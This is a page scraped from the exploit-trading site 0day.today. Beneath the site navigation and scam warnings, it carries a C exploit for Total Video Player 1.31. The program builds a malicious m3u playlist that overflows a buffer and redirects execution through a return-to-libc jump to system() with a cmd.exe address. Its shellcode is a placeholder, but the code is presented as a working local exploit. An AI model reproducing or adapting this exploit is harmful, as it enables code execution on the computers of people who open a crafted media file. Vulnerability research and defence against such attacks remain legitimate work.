0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Total Video Player V1.31 m3u playlist exploit
/* 28-08-2012 Total Video Player V1.31 m3u playlist exploit Local Exploit Written by GoTr00t Tested on Windows 7 aksuumit[at]hotmail.com */ #include <stdio.h> #include <string.h> #include <stdlib.h> int main() { char exploit[3000]; memset(exploit,0x00,sizeof(exploit)); char overflow[304]; memset(overflow,0x41,sizeof(overflow)-1); char nops[40]; memset(nops,0x90,sizeof(nops)); char shellcode[160]; memset(shellcode,0x55,sizeof(shellcode)); char HEADER[] = "#EXTM3U\n#EXTINF:,\n"; // 7694B177 address of system in the msvcrt.dll char newEIP[] = "\x77\xB1\x94\x76"; strcpy(exploit,HEADER); strcat(exploit,"c:\\"); strcat(exploit,overflow); strcat(exploit,nops); strcat(exploit,shellcode); // fake shellcode because there are multiple ways to exploit this vulnerability you can place a shellcode here strcat(exploit,newEIP); // and use this EIP to jump to the shellcode but for this example i use a return2dll technique strcat(exploit,"\x44\x44\x44\x44"); // junk or you can use this one to jump to another dll to execute so you can do a ROP to bypass protection // 7638BF27 cmd.exe strcat(exploit,"\x27\xBF\x38\x76"); // Write a exploit playlist FILE *fp = fopen("exploit.m3u","w"); fprintf(fp,exploit); fclose(fp); printf("Exploit written!\n"); return 0; } # 0day.today [2024-12-24] #